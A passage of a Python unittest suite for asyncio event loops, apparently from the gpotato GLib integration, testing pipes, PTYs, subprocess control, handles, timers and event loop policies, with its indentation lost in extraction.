proto = None
transport = None
def factory():
nonlocal proto
proto = MyWritePipeProto(loop=self.loop)
return proto
rsock, wsock = test_utils.socketpair()
pipeobj = io.open(wsock.detach(), 'wb', 1024)
@asyncio.coroutine
def connect():
nonlocal transport
t, p = yield from self.loop.connect_write_pipe(factory,
pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport = t
self.loop.run_until_complete(connect())
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@testsupport.requires_mac_ver(10, 6)
def test_write_pty(self):
proto = None
transport = None
def factory():
nonlocal proto
proto = MyWritePipeProto(loop=self.loop)
return proto
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
@asyncio.coroutine
def connect():
nonlocal transport
t, p = yield from self.loop.connect_write_pipe(factory,
slave_write_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport = t
self.loop.run_until_complete(connect())
transport.write(b'1')
test_utils.run_briefly(self.loop)
data = os.read(master, 1024)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_briefly(self.loop)
data = os.read(master, 1024)
self.assertEqual(b'2345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
def test_prompt_cancellation(self):
r, w = test_utils.socketpair()
r.setblocking(False)
f = self.loop.sock_recv(r, 1)
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
@asyncio.coroutine
def main():
try:
self.loop.call_soon(f.cancel)
yield from f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = asyncio.Task(main(), loop=self.loop)
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.1)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
@unittest.skip
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
@asyncio.coroutine
def wait():
loop = self.loop
yield from asyncio.sleep(1e-2, loop=loop)
yield from asyncio.sleep(1e-4, loop=loop)
self.loop.run_until_complete(wait())
# The ideal number of call is 6, but on some platforms, the selector
# may sleep at little bit less than timeout depending on the resolution
# of the clock used by the kernel. Tolerate 2 useless calls on these
# platforms.
self.assertLessEqual(self.loop._run_once_counter, 8,
{'time_info': time.get_clock_info('time'),
'monotonic_info': time.get_clock_info('monotonic'),
'selector': self.loop._selector.__class__.__name__})
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
def check_subp_closed(self, proto):
self.check_killed(proto.returncode)
def test_subprocess_exec(self):
proto = None
transp = None
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
@asyncio.coroutine
def connect():
nonlocal proto, transp
transp, proto = yield from self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(connect())
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_subp_closed(proto)
self.assertEqual(b'Python The Winner', proto.data[1])
def test_subprocess_interactive(self):
proto = None
transp = None
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
@asyncio.coroutine
def connect():
nonlocal proto, transp
transp, proto = yield from self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(connect())
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
try:
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
finally:
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_subp_closed(proto)
def test_subprocess_shell(self):
proto = None
transp = None
@asyncio.coroutine
def connect():
nonlocal proto, transp
transp, proto = yield from self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(connect())
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
proto = transp = None
@asyncio.coroutine
def connect():
nonlocal proto, transp
transp, proto = yield from self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(connect())
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
proto = None
transp = None
@asyncio.coroutine
def connect():
nonlocal proto, transp
transp, proto = yield from self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(connect())
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
proto = None
transp = None
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
@asyncio.coroutine
def connect():
nonlocal proto, transp
transp, proto = yield from self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(connect())
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
proto = None
transp = None
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
@asyncio.coroutine
def connect():
nonlocal proto, transp
transp, proto = yield from self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(connect())
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
proto = None
transp = None
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
@asyncio.coroutine
def connect():
nonlocal proto, transp
transp, proto = yield from self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(connect())
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
def test_subprocess_stderr(self):
proto = None
transp = None
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
@asyncio.coroutine
def connect():
nonlocal proto, transp
transp, proto = yield from self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(connect())
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
def test_subprocess_stderr_redirect_to_stdout(self):
proto = None
transp = None
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
@asyncio.coroutine
def connect():
nonlocal proto, transp
transp, proto = yield from self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(connect())
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
def test_subprocess_close_client_stream(self):
proto = None
transp = None
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
@asyncio.coroutine
def connect():
nonlocal proto, transp
transp, proto = yield from self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(connect())
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_subp_closed(proto)
def test_subprocess_wait_no_same_group(self):
proto = None
transp = None
@asyncio.coroutine
def connect():
nonlocal proto, transp
# start the new process in a new session
transp, proto = yield from self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(connect())
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_exec_invalid_args(self):
@asyncio.coroutine
def connect(**kwds):
yield from self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
@asyncio.coroutine
def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
yield from self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin, unittest.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SubprocessTestsMixin,
unittest.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
def test_create_ssl_connection(self):
raise unittest.SkipTest("IocpEventLoop incompatible with SSL")
def test_create_server_ssl(self):
raise unittest.SkipTest("IocpEventLoop incompatible with SSL")
def test_create_server_ssl_verify_failed(self):
raise unittest.SkipTest("IocpEventLoop incompatible with SSL")
def test_create_server_ssl_match_failed(self):
raise unittest.SkipTest("IocpEventLoop incompatible with SSL")
def test_create_server_ssl_verified(self):
raise unittest.SkipTest("IocpEventLoop incompatible with SSL")
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_create_datagram_endpoint(self):
raise unittest.SkipTest(
"IocpEventLoop does not have create_datagram_endpoint()")
else:
from asyncio import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin):
def setUp(self):
super().setUp()
watcher = gpotato.GLibChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
# if hasattr(selectors, 'KqueueSelector'):
# class KqueueEventLoopTests(UnixEventLoopTestsMixin,
# SubprocessTestsMixin,
# unittest.TestCase):
#
# if hasattr(selectors, 'EpollSelector'):
# class EPollEventLoopTests(UnixEventLoopTestsMixin,
# SubprocessTestsMixin,
# unittest.TestCase):
#
# def create_event_loop(self):
# return unix_events.SelectorEventLoop(selectors.EpollSelector())
#
# if hasattr(selectors, 'PollSelector'):
# class PollEventLoopTests(UnixEventLoopTestsMixin,
# SubprocessTestsMixin,
# unittest.TestCase):
#
# def create_event_loop(self):
# return unix_events.SelectorEventLoop(selectors.PollSelector())
#
# # Should always exist.
# class SelectEventLoopTests(UnixEventLoopTestsMixin,
# SubprocessTestsMixin,
# unittest.TestCase):
#
# def create_event_loop(self):
# return unix_events.SelectorEventLoop(selectors.SelectSelector())
gpotato.BaseGLibEventLoop.init_class()
GObject.threads_init()
class GLibEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
unittest.TestCase):
def create_event_loop(self):
return gpotato.GLibEventLoop(GLib.main_context_default())
if gpotato.Gtk:
class GtkEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
unittest.TestCase):
def create_event_loop(self):
return gpotato.GLibEventLoop(gtk=True)
class HandleTests(LoopSetupMixin, unittest.TestCase):
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h._cancelled)
r = repr(h)
self.assertTrue(r.startswith(
'<Handle '
'HandleTests.test_handle.<locals>.callback'))
self.assertTrue(r.endswith('>'))
h.cancel()
self.assertTrue(h._cancelled)
r = repr(h)
self.assertTrue(r.startswith('<Handle'))
self.assertTrue(r.endswith('cancelled>'), r)
def test_handle_assertion(self):
def callback(*args):
return args
h1 = asyncio.Handle(callback, (), self.loop)
self.assertRaises(
AssertionError, asyncio.Handle, h1, (), self.loop)
@unittest.expectedFailure
@unittest.mock.patch('asyncio.log.logger')
def test_callback_with_exception(self, log):
def callback():
raise ValueError()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.assertTrue(log.exception.called)
@unittest.skip("TimerHandle unused by gpotato")
class TimerTests(LoopSetupMixin, unittest.TestCase):
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (), self.loop)
self.assertEqual(hash(h), hash(when))
def test_timer(self):
def callback(*args):
return args
args = ()
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h._cancelled)
r = repr(h)
self.assertTrue(r.endswith('>'))
h.cancel()
self.assertTrue(h._cancelled)
r = repr(h)
self.assertTrue(r.endswith(' cancelled>'), r)
self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args)
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, ())
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = unittest.mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.run_in_executor, f, f)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.getaddrinfo, 'localhost', 8080)
self.assertRaises(
NotImplementedError, loop.getnameinfo, ('localhost', 8080))
self.assertRaises(
NotImplementedError, loop.create_connection, f)
self.assertRaises(
NotImplementedError, loop.create_server, f)
self.assertRaises(
NotImplementedError, loop.create_datagram_endpoint, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.sock_recv, f, 10)
self.assertRaises(
NotImplementedError, loop.sock_sendall, f, 10)
self.assertRaises(
NotImplementedError, loop.sock_connect, f, f)
self.assertRaises(
NotImplementedError, loop.sock_accept, f)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.connect_read_pipe, f,
unittest.mock.sentinel.pipe)
self.assertRaises(
NotImplementedError, loop.connect_write_pipe, f,
unittest.mock.sentinel.pipe)
self.assertRaises(
NotImplementedError, loop.subprocess_shell, f,
unittest.mock.sentinel)
self.assertRaises(
NotImplementedError, loop.subprocess_exec, f)
class ProtocolsAbsTests(unittest.TestCase):
def test_empty(self):
f = unittest.mock.Mock()
p = asyncio.Protocol()
self.assertIsNone(p.connection_made(f))
self.assertIsNone(p.connection_lost(f))
self.assertIsNone(p.data_received(f))
self.assertIsNone(p.eof_received())
dp = asyncio.DatagramProtocol()
self.assertIsNone(dp.connection_made(f))
self.assertIsNone(dp.connection_lost(f))
self.assertIsNone(dp.error_received(f))
self.assertIsNone(dp.datagram_received(f, f))
sp = asyncio.SubprocessProtocol()
self.assertIsNone(sp.connection_made(f))
self.assertIsNone(sp.connection_lost(f))
self.assertIsNone(sp.pipe_data_received(1, f))
self.assertIsNone(sp.pipe_connection_lost(1, f))
self.assertIsNone(sp.process_exited())
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with unittest.mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@unittest.mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(AssertionError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
if __name__ == '__main__':
unittest.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.